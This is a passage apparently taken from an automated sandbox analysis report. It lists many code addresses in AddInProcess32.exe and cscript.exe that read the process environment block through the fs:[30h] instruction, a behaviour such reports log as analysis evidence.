          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01408ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01362AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01400EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01400EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01400EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01378EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01362ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04868CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04848DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04868D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0481A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04813540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04843D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0484FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04868ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04851608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0484FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04868F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04861074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04852073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04799080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_048241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04795210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0485AA16 mov eax, dword ptr fs:[00000030h]
